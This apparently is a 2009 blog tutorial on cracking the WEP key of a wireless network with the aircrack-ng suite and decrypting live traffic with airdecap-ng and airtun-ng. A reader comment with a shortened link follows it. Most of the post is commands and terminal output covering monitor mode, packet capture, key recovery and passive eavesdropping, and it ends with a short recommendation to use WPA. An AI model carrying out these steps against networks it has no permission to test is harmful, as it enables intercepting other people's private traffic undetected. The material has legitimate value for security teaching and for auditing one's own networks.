Aug 09 2009
How to crack a WEP key and decrypt live traffic
Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much… We are going to decrypt traffic in real time as well without even needing to connect to the wireless access point.
All steps will be run under root super-user as interfaces state needs to be changed.
Aircrack Installation
Download and install aircrack-ng. It’s available on most Linux distributions in a package format.
On Debian, run
apt-get install aircrack-ng
Aircrack provides tools to capture packets, crack the WEP key, and decrypt live traffic.
We’ll run tests with a Linksys PCMCIA wifi card. A simple ifconfig displays the card’s network stats that tells us it’s been detected.
root@crack_WEP:~$ ifconfig
lo Interface doesn't support scanning.
wlan0 Link encap:Ethernet HWaddr 00:1a:70:6b:37:4e
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:22 errors:0 dropped:0 overruns:0 frame:0
TX packets:63 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3742 (3.7 KB) TX bytes:10773 (10.7 KB)
Capturing Packets
The interface needs to be switched to monitor mode in the first place.
root@crack_WEP:~$ airmon-ng
Interface Chipset Driver
wlan0 Broadcom 43xx b43 - [phy0]
Airmon has detected the interface is wlan0. It could be a different name of course such as ath0 for instance.
root@crack_WEP:~$ airmon-ng stop wlan0
Interface Chipset Driver
wlan0 Broadcom 43xx b43 - [phy0]
(monitor mode disabled)
root@crack_WEP:~$ airmon-ng start wlan0
Interface Chipset Driver
wlan0 Broadcom 43xx b43 - [phy0]
(monitor mode enabled on mon0)
Running iwconfig shows mon0 has been added in addition to the original interface wlan0:
root@crack_WEP:~$ iwconfig
wlan0 IEEE 802.11bg ESSID:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
We can now scan available networks around the place
root@crack_WEP:~$ airodump-ng mon0
CH 10 ][ Elapsed: 4 s ][ 2009-08-08 18:01
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:A0:C5:FF:84:72 197 4 0 0 1 11 WEP WEP private
BSSID STATION PWR Rate Lost Packets Probes
Scan results show we’ve got an access point emitting on channel 1 with WEP encryption, that has mac address 00:A0:C5:FF:84:72.
The target now defined, we need to capture air packets broadcasted by access point and clients.
root@crack_WEP:~$ airodump-ng --channel 1 --bssid 00:A0:C5:FF:84:72 --write temp wlan0
CH 1 ][ Elapsed: 31 mins ][ 2009-05-02 21:52
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:A0:C5:FF:84:72 205 10 6058 24496 0 1 54 WEP WEP private
BSSID STATION PWR Rate Lost Packets Probes
00:A0:C5:FF:84:72 00:18:4D:76:30:EB 188 54-54 0 24795
Packets are captured in .cap files with the temp suffix.
Cracking techniques getting more efficient, there are good chances to crack a key with no more than 40000 packets with recent algorithms. Capturing time varies with the amount of traffic on the air link.
Cracking the WEP key
It is now time to crack the WEP key:
root@crack_WEP:~$ aircrack-ng -z -b 00:A0:C5:FF:84:72 temp.cap-0*.cap
Aircrack-ng 1.0 rc1
[00:00:22] Tested 240228 keys (got 41742 IVs)
KB depth byte(vote)
0 0/ 1 B9(58880) A0(50688) 12(50176) F5(49920) 9E(48896) CD(48640)
1 0/ 1 19(54784) E8(52480) FA(52480) 4B(51456) 79(51456) DD(49664)
2 0/ 1 31(59648) EA(53504) 40(50688) 0A(50432) 88(50432) 0E(50176)
3 0/ 1 8C(60416) 05(49152) 56(49152) 23(48640) 52(48384) 03(48128)
4 0/ 1 B2(59136) AE(49664) 78(49152) FE(49152) 8B(48384) 9C(47616)
5 0/ 1 61(53504) E6(50688) FF(50176) 13(49664) 23(49408) C7(49408)
6 0/ 1 DD(56320) C4(51968) 90(50688) 0C(50176) CF(49920) CE(49152)
7 0/ 1 4E(53248) E6(51968) 7D(49152) 0B(48896) 90(48896) 06(48640)
8 0/ 1 FB(52224) C1(49664) E9(48128) 3D(47616) F0(47360) EB(47104)
9 0/ 1 0B(54784) BC(51712) 52(50432) 54(49920) F5(49920) CA(48896)
10 0/ 1 E6(50944) 1C(49920) 5F(49408) 1F(49152) 0A(48896) 83(48896)
11 2/ 1 FF(49664) 17(48384) 94(48128) 27(47872) 23(47616) B2(47616)
12 0/ 4 91(50452) A4(50360) 77(50156) 78(49540) FF(49476) 70(48788)
KEY FOUND! [ B9:19:31:8C:B2:61:DD:4E:FB:0B:AA:62:99 ]
Decrypted correctly: 100%
That’s right, the key was cracked in 22 seconds!
Decrypting Traffic
It is possible to capture the traffic in .cap files as above, decrypt it in a second file before sending it to the tcpdump command for instance:
root@crack_WEP:~$ airdecap-ng -w b919318cb261dd4efb0baa6299 temp-01.cap
Total number of packets read 22072
Total number of WEP data packets 6245
Total number of WPA data packets 0
Number of plaintext data packets 3
Number of decrypted WEP packets 6245
Number of corrupted WEP packets 0
Number of decrypted WPA packets 0
root@crack_WEP:~$ tcpdump -r temp-01-dec.cap -i wlan
But it is also possible to decrypt live traffic in real time sending it to a virtual interface at0 on which we can listen as with any real interface. Airtun-ng provided in Aircrack package has the ability to do so.
root@crack_WEP:~$ airtun-ng -a 00:A0:C5:FF:84:72 -w b919318cb261dd4efb0baa6299 mon0
created tap interface at0
WEP encryption specified. Sending and receiving frames through mon0.
FromDS bit set in all frames.
From another shell:
crack_WEP:~$ tcpdump -i at0
Conclusion
It is indeed very easy to crack a WEP key and listen to the traffic without associating to the access point hence without being detected. Pay attention to use at least WPA with non-dictionnary based passwords.
Sometimes it is difficult to manage airodump-ng output files. i mean once i generate those csv and xml files then after i start looking into it so for large amount of data i can’t figure it out. so is there any tools or services available for analysis and visualization ?
I have used this website and it is quite good, here i have shared my sample data have a look and also share any other sources if anyone knows. – http://bit.ly/1Nbfgm6